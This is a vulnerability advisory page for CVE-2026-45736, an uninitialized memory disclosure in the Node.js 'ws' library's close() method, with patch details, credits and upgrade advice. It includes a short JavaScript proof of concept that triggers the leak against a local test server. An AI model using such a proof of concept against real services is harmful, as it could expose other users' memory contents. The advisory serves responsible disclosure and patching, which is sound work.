CVE-2026-45736
ws: Uninitialized memory disclosure
Description
### Impact The `websocket.close()` implementation is vulnerable to uninitialized memory disclosure when a `TypedArray` is passed as the reason argument. ### Proof of concept ```js import { deepStrictEqual } from 'node:assert'; import { WebSocket, WebSocketServer } from 'ws'; const wss = new WebSocketServer( { port: 0, skipUTF8Validation: true }, function () { const { port } = wss.address(); const ws = new WebSocket(`ws://localhost:${port}`, { skipUTF8Validation: true }); ws.on('close', function (code, reason) { deepStrictEqual(reason, Buffer.alloc(80)); }); } ); wss.on('connection', function (ws) { ws.close(1000, new Float32Array(20)); }); ``` ### Patches The vulnerability was fixed in [email protected] (https://github.com/websockets/ws/commit/c0327ec15a54d701eb6ccefaa8bef328cfc03086). ### Credits Credit for the private and responsible disclosure of this issue goes to [Nikita Skovoroda](https://github.com/ChALkeR). ### Remarks Although the calculated CVSS severity is medium, the actual severity is believed to be low, as the flaw is only exploitable through misuse that is unlikely in practice. ### Resources - https://github.com/advisories/GHSA-58qx-3vcg-4xpx - https://www.cve.org/CVERecord?id=CVE-2026-45736
How to fix CVE-2026-45736
To remediate CVE-2026-45736, upgrade the affected package to a fixed version below.
- —no fix listed
- —upgrade to 8.20.1 or later
Is CVE-2026-45736 being exploited?
Low — EPSS is 0.0%, meaning exploitation activity has not been observed at scale.
Affected packages (2)
- from 0